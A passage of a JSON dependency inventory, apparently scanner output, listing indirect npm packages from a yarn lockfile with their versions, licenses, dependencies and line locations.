"1d52b245e91bed61" }, "Version": "3.0.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8103, "EndLine": 8104 } ], "AnalyzedBy": "yarn" }, { "ID": "npmlog@4.1.2", "Name": "npmlog", "Identifier": { "PURL": "pkg:npm/npmlog@4.1.2", "UID": "8f757afb1f2a82e5" }, "Version": "4.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "are-we-there-yet@1.1.7", "console-control-strings@1.1.0", "gauge@2.7.4", "set-blocking@2.0.0" ], "Locations": [ { "StartLine": 8177, "EndLine": 8185 } ], "AnalyzedBy": "yarn" }, { "ID": "nth-check@2.1.1", "Name": "nth-check", "Identifier": { "PURL": "pkg:npm/nth-check@2.1.1", "UID": "aeffab015638bd03" }, "Version": "2.1.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "boolbase@1.0.0" ], "Locations": [ { "StartLine": 8197, "EndLine": 8202 } ], "AnalyzedBy": "yarn" }, { "ID": "nullthrows@1.1.1", "Name": "nullthrows", "Identifier": { "PURL": "pkg:npm/nullthrows@1.1.1", "UID": "6c4df0261a54fac6" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8204, "EndLine": 8207 } ], "AnalyzedBy": "yarn" }, { "ID": "number-is-nan@1.0.1", "Name": "number-is-nan", "Identifier": { "PURL": "pkg:npm/number-is-nan@1.0.1", "UID": "ee1e112181c387e6" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8209, "EndLine": 8212 } ], "AnalyzedBy": "yarn" }, { "ID": "ob1@0.83.3", "Name": "ob1", "Identifier": { "PURL": "pkg:npm/ob1@0.83.3", "UID": "746b959c8783407a" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6" ], "Locations": [ { "StartLine": 8214, "EndLine": 8219 } ], "AnalyzedBy": "yarn" }, { "ID": "object-assign@4.1.1", "Name": "object-assign", "Identifier": { "PURL": "pkg:npm/object-assign@4.1.1", "UID": "c7a2bf8e2863c4e6" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8221, "EndLine": 8224 } ], "AnalyzedBy": "yarn" }, { "ID": "on-finished@2.3.0", "Name": "on-finished", "Identifier": { "PURL": "pkg:npm/on-finished@2.3.0", "UID": "6f9f18fa16e9adc0" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ee-first@1.1.1" ], "Locations": [ { "StartLine": 8278, "EndLine": 8283 } ], "AnalyzedBy": "yarn" }, { "ID": "on-finished@2.4.1", "Name": "on-finished", "Identifier": { "PURL": "pkg:npm/on-finished@2.4.1", "UID": "6e3ba33db6a82d6b" }, "Version": "2.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ee-first@1.1.1" ], "Locations": [ { "StartLine": 8285, "EndLine": 8290 } ], "AnalyzedBy": "yarn" }, { "ID": "once@1.4.0", "Name": "once", "Identifier": { "PURL": "pkg:npm/once@1.4.0", "UID": "769fdbfc21c99ee" }, "Version": "1.4.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "wrappy@1.0.2" ], "Locations": [ { "StartLine": 8297, "EndLine": 8302 } ], "AnalyzedBy": "yarn" }, { "ID": "onetime@5.1.2", "Name": "onetime", "Identifier": { "PURL": "pkg:npm/onetime@5.1.2", "UID": "412a065f4de5b621" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mimic-fn@2.1.0" ], "Locations": [ { "StartLine": 8304, "EndLine": 8309 } ], "AnalyzedBy": "yarn" }, { "ID": "open@7.4.2", "Name": "open", "Identifier": { "PURL": "pkg:npm/open@7.4.2", "UID": "568d0c1092fe16f2" }, "Version": "7.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-docker@2.2.1", "is-wsl@2.2.0" ], "Locations": [ { "StartLine": 8326, "EndLine": 8332 } ], "AnalyzedBy": "yarn" }, { "ID": "ora@5.4.1", "Name": "ora", "Identifier": { "PURL": "pkg:npm/ora@5.4.1", "UID": "fef5d5d4a7c9549b" }, "Version": "5.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bl@4.1.0", "chalk@4.1.2", "cli-cursor@3.1.0", "cli-spinners@2.9.2", "is-interactive@1.0.0", "is-unicode-supported@0.1.0", "log-symbols@4.1.0", "strip-ansi@6.0.1", "wcwidth@1.0.1" ], "Locations": [ { "StartLine": 8346, "EndLine": 8359 } ], "AnalyzedBy": "yarn" }, { "ID": "p-limit@2.3.0", "Name": "p-limit", "Identifier": { "PURL": "pkg:npm/p-limit@2.3.0", "UID": "18a5b86bd5b93076" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-try@2.2.0" ], "Locations": [ { "StartLine": 8377, "EndLine": 8382 } ], "AnalyzedBy": "yarn" }, { "ID": "p-limit@3.1.0", "Name": "p-limit", "Identifier": { "PURL": "pkg:npm/p-limit@3.1.0", "UID": "7668e669944cebf0" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yocto-queue@0.1.0" ], "Locations": [ { "StartLine": 8384, "EndLine": 8389 } ], "AnalyzedBy": "yarn" }, { "ID": "p-locate@3.0.0", "Name": "p-locate", "Identifier": { "PURL": "pkg:npm/p-locate@3.0.0", "UID": "db24b80c54867b1a" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-limit@2.3.0" ], "Locations": [ { "StartLine": 8391, "EndLine": 8396 } ], "AnalyzedBy": "yarn" }, { "ID": "p-locate@4.1.0", "Name": "p-locate", "Identifier": { "PURL": "pkg:npm/p-locate@4.1.0", "UID": "2cbd29f4b7594691" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-limit@2.3.0" ], "Locations": [ { "StartLine": 8398, "EndLine": 8403 } ], "AnalyzedBy": "yarn" }, { "ID": "p-locate@5.0.0", "Name": "p-locate", "Identifier": { "PURL": "pkg:npm/p-locate@5.0.0", "UID": "c9af6ec248cdc27d" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-limit@3.1.0" ], "Locations": [ { "StartLine": 8405, "EndLine": 8410 } ], "AnalyzedBy": "yarn" }, { "ID": "p-map@7.0.3", "Name": "p-map", "Identifier": { "PURL": "pkg:npm/p-map@7.0.3", "UID": "55728e1e311d41b9" }, "Version": "7.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8419, "EndLine": 8420 } ], "AnalyzedBy": "yarn" }, { "ID": "p-try@2.2.0", "Name": "p-try", "Identifier": { "PURL": "pkg:npm/p-try@2.2.0", "UID": "825647d8b08de80e" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8422, "EndLine": 8425 } ], "AnalyzedBy": "yarn" }, { "ID": "package-json-from-dist@1.0.1", "Name": "package-json-from-dist", "Identifier": { "PURL": "pkg:npm/package-json-from-dist@1.0.1", "UID": "d72de3a81351229" }, "Version": "1.0.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8427, "EndLine": 8430 } ], "AnalyzedBy": "yarn" }, { "ID": "pacote@21.0.3", "Name": "pacote", "Identifier": { "PURL": "pkg:npm/pacote@21.0.3", "UID": "c3751a7657620ecb" }, "Version": "21.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/git@7.0.0", "@npmcli/installed-package-contents@3.0.0", "@npmcli/package-json@7.0.1", "@npmcli/promise-spawn@8.0.3", "@npmcli/run-script@10.0.0", "cacache@20.0.1", "fs-minipass@3.0.3", "minipass@7.1.2", "npm-package-arg@13.0.1", "npm-packlist@10.0.2", "npm-pick-manifest@11.0.1", "npm-registry-fetch@19.0.0", "proc-log@5.0.0", "promise-retry@2.0.1", "sigstore@4.0.0", "ssri@12.0.0", "tar@7.5.1" ], "Locations": [ { "StartLine": 8432, "EndLine": 8451 } ], "AnalyzedBy": "yarn" }, { "ID": "parent-module@1.0.1", "Name": "parent-module", "Identifier": { "PURL": "pkg:npm/parent-module@1.0.1", "UID": "1b91838d551b4bcb" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "callsites@3.1.0" ], "Locations": [ { "StartLine": 8453, "EndLine": 8458 } ], "AnalyzedBy": "yarn" }, { "ID": "parse-conflict-json@4.0.0", "Name": "parse-conflict-json", "Identifier": { "PURL": "pkg:npm/parse-conflict-json@4.0.0", "UID": "4479a56c5854e7ce" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "json-parse-even-better-errors@4.0.0", "just-diff@6.0.2", "just-diff-apply@5.5.0" ], "Locations": [ { "StartLine": 8460, "EndLine": 8465 } ], "AnalyzedBy": "yarn" }, { "ID": "parse-json@5.2.0", "Name": "parse-json", "Identifier": { "PURL": "pkg:npm/parse-json@5.2.0", "UID": "8382c6b9d49b29de" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "error-ex@1.3.4", "json-parse-even-better-errors@2.3.1", "lines-and-columns@1.2.4" ], "Locations": [ { "StartLine": 8467, "EndLine": 8475 } ], "AnalyzedBy": "yarn" }, { "ID": "parseurl@1.3.3", "Name": "parseurl", "Identifier": { "PURL": "pkg:npm/parseurl@1.3.3", "UID": "540b9fcf8360c6da" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8477, "EndLine": 8480 } ], "AnalyzedBy": "yarn" }, { "ID": "path-dirname@1.0.2", "Name": "path-dirname", "Identifier": { "PURL": "pkg:npm/path-dirname@1.0.2", "UID": "72e0c8578115bbcd" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8502, "EndLine": 8505 } ], "AnalyzedBy": "yarn" }, { "ID": "path-exists@3.0.0", "Name": "path-exists", "Identifier": { "PURL": "pkg:npm/path-exists@3.0.0", "UID": "de215f073da25b38" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8507, "EndLine": 8510 } ], "AnalyzedBy": "yarn" }, { "ID": "path-exists@4.0.0", "Name": "path-exists", "Identifier": { "PURL": "pkg:npm/path-exists@4.0.0", "UID": "458135f8fff146f" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8512, "EndLine": 8515 } ], "AnalyzedBy": "yarn" }, { "ID": "path-extra@1.0.3", "Name": "path-extra", "Identifier": { "PURL": "pkg:npm/path-extra@1.0.3", "UID": "f930545cafc31a22" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8517, "EndLine": 8520 } ], "AnalyzedBy": "yarn" }, { "ID": "path-is-absolute@1.0.1", "Name": "path-is-absolute", "Identifier": { "PURL": "pkg:npm/path-is-absolute@1.0.1", "UID": "95533b125f16e247" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8522, "EndLine": 8525 } ], "AnalyzedBy": "yarn" }, { "ID": "path-key@3.1.1", "Name": "path-key", "Identifier": { "PURL": "pkg:npm/path-key@3.1.1", "UID": "605dc4a8167b4221" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8527, "EndLine": 8530 } ], "AnalyzedBy": "yarn" }, { "ID": "path-parse@1.0.7", "Name": "path-parse", "Identifier": { "PURL": "pkg:npm/path-parse@1.0.7", "UID": "e06cff8c5d872f35" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8532, "EndLine": 8535 } ], "AnalyzedBy": "yarn" }, { "ID": "path-scurry@1.11.1", "Name": "path-scurry", "Identifier": { "PURL": "pkg:npm/path-scurry@1.11.1", "UID": "defd855add97f503" }, "Version": "1.11.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@10.4.3", "minipass@7.1.2" ], "Locations": [ { "StartLine": 8537, "EndLine": 8543 } ], "AnalyzedBy": "yarn" }, { "ID": "path-scurry@2.0.0", "Name": "path-scurry", "Identifier": { "PURL": "pkg:npm/path-scurry@2.0.0", "UID": "633250ebcb0100e7" }, "Version": "2.0.0", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@11.2.2", "minipass@7.1.2" ], "Locations": [ { "StartLine": 8545, "EndLine": 8549 } ], "AnalyzedBy": "yarn" }, { "ID": "path-type@4.0.0", "Name": "path-type", "Identifier": { "PURL": "pkg:npm/path-type@4.0.0", "UID": "89bc8cee7c188a98" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8551, "EndLine": 8554 } ], "AnalyzedBy": "yarn" }, { "ID": "paths-js@0.4.11", "Name": "paths-js", "Identifier": { "PURL": "pkg:npm/paths-js@0.4.11", "UID": "63d51af71a92501d" }, "Version": "0.4.11", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8556, "EndLine": 8559 } ], "AnalyzedBy": "yarn" }, { "ID": "picocolors@1.1.1", "Name": "picocolors", "Identifier": { "PURL": "pkg:npm/picocolors@1.1.1", "UID": "57417cdf80cf1f6a" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8561, "EndLine": 8564 } ], "AnalyzedBy": "yarn" }, { "ID": "picomatch@2.3.1", "Name": "picomatch", "Identifier": { "PURL": "pkg:npm/picomatch@2.3.1", "UID": "a3727870b0227353" }, "Version": "2.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8566, "EndLine": 8569 } ], "AnalyzedBy": "yarn" }, { "ID": "picomatch@4.0.3", "Name": "picomatch", "Identifier": { "PURL": "pkg:npm/picomatch@4.0.3", "UID": "166fd27b204f47e7" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8571, "EndLine": 8574 } ], "AnalyzedBy": "yarn" }, { "ID": "pirates@4.0.7", "Name": "pirates", "Identifier": { "PURL": "pkg:npm/pirates@4.0.7", "UID": "bb4bd308e87efd6b" }, "Version": "4.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8576, "EndLine": 8579 } ], "AnalyzedBy": "yarn" }, { "ID": "pkg-up@3.1.0", "Name": "pkg-up", "Identifier": { "PURL": "pkg:npm/pkg-up@3.1.0", "UID": "d131eb564d276b31" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "find-up@3.0.0" ], "Locations": [ { "StartLine": 8588, "EndLine": 8593 } ], "AnalyzedBy": "yarn" }, { "ID": "plist@3.1.0", "Name": "plist", "Identifier": { "PURL": "pkg:npm/plist@3.1.0", "UID": "592e948586eab495" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@xmldom/xmldom@0.8.11", "base64-js@1.5.1", "xmlbuilder@15.1.1" ], "Locations": [ { "StartLine": 8595, "EndLine": 8602 } ], "AnalyzedBy": "yarn" }, { "ID": "point-in-polygon@1.1.0", "Name": "point-in-polygon", "Identifier": { "PURL": "pkg:npm/point-in-polygon@1.1.0", "UID": "8a14a3d3b47ad437" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8604, "EndLine": 8607 } ], "AnalyzedBy": "yarn" }, { "ID": "possible-typed-array-names@1.1.0", "Name": "possible-typed-array-names", "Identifier": { "PURL": "pkg:npm/possible-typed-array-names@1.1.0", "UID": "7c8c305b56412cb1" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8609, "EndLine": 8612 } ], "AnalyzedBy": "yarn" }, { "ID": "postcss-selector-parser@7.1.0", "Name": "postcss-selector-parser", "Identifier": { "PURL": "pkg:npm/postcss-selector-parser@7.1.0", "UID": "b0e637f9ffefe1ce" }, "Version": "7.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cssesc@3.0.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 8614, "EndLine": 8618 } ], "AnalyzedBy": "yarn" }, { "ID": "postcss-value-parser@4.2.0", "Name": "postcss-value-parser", "Identifier": { "PURL": "pkg:npm/postcss-value-parser@4.2.0", "UID": "6123a3742980ddc6" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8620, "EndLine": 8623 } ], "AnalyzedBy": "yarn" }, { "ID": "prebuild-install@7.1.3", "Name": "prebuild-install", "Identifier": { "PURL": "pkg:npm/prebuild-install@7.1.3", "UID": "40a011085d703d7b" }, "Version": "7.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "detect-libc@2.1.2", "expand-template@2.0.3", "github-from-package@0.0.0", "minimist@1.2.8", "mkdirp-classic@0.5.3", "napi-build-utils@2.0.0", "node-abi@3.78.0", "pump@3.0.3", "rc@1.2.8", "simple-get@4.0.1", "tar-fs@2.1.4", "tunnel-agent@0.6.0" ], "Locations": [ { "StartLine": 8630, "EndLine": 8646 } ], "AnalyzedBy": "yarn" }, { "ID": "prettier@3.6.2", "Name": "prettier", "Identifier": { "PURL": "pkg:npm/prettier@3.6.2", "UID": "26abbb0128933167" }, "Version": "3.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8653, "EndLine": 8656 } ], "AnalyzedBy": "yarn" }, { "ID": "pretty-format@29.7.0", "Name": "pretty-format", "Identifier": { "PURL": "pkg:npm/pretty-format@29.7.0", "UID": "81d1d262e9404249" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/schemas@29.6.3", "ansi-styles@5.2.0", "react-is@18.3.1" ], "Locations": [ { "StartLine": 8663, "EndLine": 8670 } ], "AnalyzedBy": "yarn" }, { "ID": "proc-log@5.0.0", "Name": "proc-log", "Identifier": { "PURL": "pkg:npm/proc-log@5.0.0", "UID": "2f3285f7af06e022" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8672, "EndLine": 8673 } ], "AnalyzedBy": "yarn" }, { "ID": "process@0.11.10", "Name": "process", "Identifier": { "PURL": "pkg:npm/process@0.11.10", "UID": "984aaf56e8ebaf7e" }, "Version": "0.11.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8680, "EndLine": 8683 } ], "AnalyzedBy": "yarn" }, { "ID": "process-nextick-args@2.0.1", "Name": "process-nextick-args", "Identifier": { "PURL": "pkg:npm/process-nextick-args@2.0.1", "UID": "f0a683b899f8ebec" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8675, "EndLine": 8678 } ], "AnalyzedBy": "yarn" }, { "ID": "proggy@3.0.0", "Name": "proggy", "Identifier": { "PURL": "pkg:npm/proggy@3.0.0", "UID": "c9ad2b54fa672279" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8685, "EndLine": 8686 } ], "AnalyzedBy": "yarn" }, { "ID": "promise@7.3.1", "Name": "promise", "Identifier": { "PURL": "pkg:npm/promise@7.3.1", "UID": "2a3de558d805f70c" }, "Version": "7.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asap@2.0.6" ], "Locations": [ { "StartLine": 8711, "EndLine": 8716 } ], "AnalyzedBy": "yarn" }, { "ID": "promise@8.3.0", "Name": "promise", "Identifier": { "PURL": "pkg:npm/promise@8.3.0", "UID": "120d13e6275706af" }, "Version": "8.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "asap@2.0.6" ], "Locations": [ { "StartLine": 8718, "EndLine": 8723 } ], "AnalyzedBy": "yarn" }, { "ID": "promise-all-reject-late@1.0.1", "Name": "promise-all-reject-late", "Identifier": { "PURL": "pkg:npm/promise-all-reject-late@1.0.1", "UID": "d0c253c9932f550b" }, "Version": "1.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8688, "EndLine": 8691 } ], "AnalyzedBy": "yarn" }, { "ID": "promise-call-limit@3.0.2", "Name": "promise-call-limit", "Identifier": { "PURL": "pkg:npm/promise-call-limit@3.0.2", "UID": "126249345f75af32" }, "Version": "3.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8693, "EndLine": 8696 } ], "AnalyzedBy": "yarn" }, { "ID": "promise-retry@2.0.1", "Name": "promise-retry", "Identifier": { "PURL": "pkg:npm/promise-retry@2.0.1", "UID": "57a1e6055cbc1108" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "err-code@2.0.3", "retry@0.12.0" ], "Locations": [ { "StartLine": 8703, "EndLine": 8709 } ], "AnalyzedBy": "yarn" }, { "ID": "prompts@2.4.2", "Name": "prompts", "Identifier": { "PURL": "pkg:npm/prompts@2.4.2", "UID": "b7bad1513367e92e" }, "Version": "2.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "kleur@3.0.3", "sisteransi@1.0.5" ], "Locations": [ { "StartLine": 8725, "EndLine": 8731 } ], "AnalyzedBy": "yarn" }, { "ID": "promzard@2.0.0", "Name": "promzard", "Identifier": { "PURL": "pkg:npm/promzard@2.0.0", "UID": "2cabb0a039071a47" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "read@4.1.0" ], "Locations": [ { "StartLine": 8733, "EndLine": 8736 } ], "AnalyzedBy": "yarn" }, { "ID": "prop-types@15.8.1", "Name": "prop-types", "Identifier": { "PURL": "pkg:npm/prop-types@15.8.1", "UID": "4d79e943b9efb988" }, "Version": "15.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0", "object-assign@4.1.1", "react-is@16.13.1" ], "Locations": [ { "StartLine": 8738, "EndLine": 8745 } ], "AnalyzedBy": "yarn" }, { "ID": "protobufjs@7.5.4", "Name": "protobufjs", "Identifier": { "PURL": "pkg:npm/protobufjs@7.5.4", "UID": "4bd1bebf607e950b" }, "Version": "7.5.4", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@protobufjs/aspromise@1.1.2", "@protobufjs/base64@1.1.2", "@protobufjs/codegen@2.0.4", "@protobufjs/eventemitter@1.1.0", "@protobufjs/fetch@1.1.0", "@protobufjs/float@1.0.2", "@protobufjs/inquire@1.1.0", "@protobufjs/path@1.1.2", "@protobufjs/pool@1.1.0", "@protobufjs/utf8@1.1.0", "@types/node@24.7.0", "long@5.3.2" ], "Locations": [ { "StartLine": 8747, "EndLine": 8763 } ], "AnalyzedBy": "yarn" }, { "ID": "proxy-from-env@1.1.0", "Name": "proxy-from-env", "Identifier": { "PURL": "pkg:npm/proxy-from-env@1.1.0", "UID": "969b50a9103235c1" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8765, "EndLine": 8768 } ], "AnalyzedBy": "yarn" }, { "ID": "pump@3.0.3", "Name": "pump", "Identifier": { "PURL": "pkg:npm/pump@3.0.3", "UID": "33bb2868dc30d48d" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "end-of-stream@1.4.5", "once@1.4.0" ], "Locations": [ { "StartLine": 8770, "EndLine": 8776 } ], "AnalyzedBy": "yarn" }, { "ID": "qrcode-terminal@0.12.0", "Name": "qrcode-terminal", "Identifier": { "PURL": "pkg:npm/qrcode-terminal@0.12.0", "UID": "9a188c808a075609" }, "Version": "0.12.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8788, "EndLine": 8791 } ], "AnalyzedBy": "yarn" }, { "ID": "query-string@7.1.3", "Name": "query-string", "Identifier": { "PURL": "pkg:npm/query-string@7.1.3", "UID": "d87934e03912518f" }, "Version": "7.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "decode-uri-component@0.2.2", "filter-obj@1.1.0", "split-on-first@1.1.0", "strict-uri-encode@2.0.0" ], "Locations": [ { "StartLine": 8800, "EndLine": 8808 } ], "AnalyzedBy": "yarn" }, { "ID": "queue@6.0.2", "Name": "queue", "Identifier": { "PURL": "pkg:npm/queue@6.0.2", "UID": "abcc7152b78d0bd5" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4" ], "Locations": [ { "StartLine": 8815, "EndLine": 8820 } ], "AnalyzedBy": "yarn" }, { "ID": "queue-microtask@1.2.3", "Name": "queue-microtask", "Identifier": { "PURL": "pkg:npm/queue-microtask@1.2.3", "UID": "b66500e9fdae917f" }, "Version": "1.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8810, "EndLine": 8813 } ], "AnalyzedBy": "yarn" }, { "ID": "quick-lru@4.0.1", "Name": "quick-lru", "Identifier": { "PURL": "pkg:npm/quick-lru@4.0.1", "UID": "583c5dc5fb027f1e" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8822, "EndLine": 8825 } ], "AnalyzedBy": "yarn" }, { "ID": "range-parser@1.2.1", "Name": "range-parser", "Identifier": { "PURL": "pkg:npm/range-parser@1.2.1", "UID": "cd5b66b98def0a23" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8827, "EndLine": 8830 } ], "AnalyzedBy": "yarn" }, { "ID": "rc@1.2.8", "Name": "rc", "Identifier": { "PURL": "pkg:npm/rc@1.2.8", "UID": "39f7d6041172448e" }, "Version": "1.2.8", "Licenses": [ "(BSD-2-Clause OR MIT OR Apache-2.0)" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "deep-extend@0.6.0", "ini@1.3.8", "minimist@1.2.8", "strip-json-comments@2.0.1" ], "Locations": [ { "StartLine": 8842, "EndLine": 8850 } ], "AnalyzedBy": "yarn" }, { "ID": "react-addons-shallow-compare@15.6.2", "Name": "react-addons-shallow-compare", "Identifier": { "PURL": "pkg:npm/react-addons-shallow-compare@15.6.2", "UID": "5ac6eb7c891902e" }, "Version": "15.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fbjs@0.8.18", "object-assign@4.1.1" ], "Locations": [ { "StartLine": 8852, "EndLine": 8858 } ], "AnalyzedBy": "yarn" }, { "ID": "react-devtools-core@6.1.5", "Name": "react-devtools-core", "Identifier": { "PURL": "pkg:npm/react-devtools-core@6.1.5", "UID": "eb9eb72f359cc05a" }, "Version": "6.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "shell-quote@1.8.3", "ws@7.5.10" ], "Locations": [ { "StartLine": 8860, "EndLine": 8866 } ], "AnalyzedBy": "yarn" }, { "ID": "react-freeze@1.0.4", "Name": "react-freeze", "Identifier": { "PURL": "pkg:npm/react-freeze@1.0.4", "UID": "bba332ce569879cf" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8868, "EndLine": 8871 } ], "AnalyzedBy": "yarn" }, { "ID": "react-is@16.13.1", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@16.13.1", "UID": "f3504d5384233908" }, "Version": "16.13.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8873, "EndLine": 8876 } ], "AnalyzedBy": "yarn" }, { "ID": "react-is@18.3.1", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@18.3.1", "UID": "ad8da2c097afc1ec" }, "Version": "18.3.1", 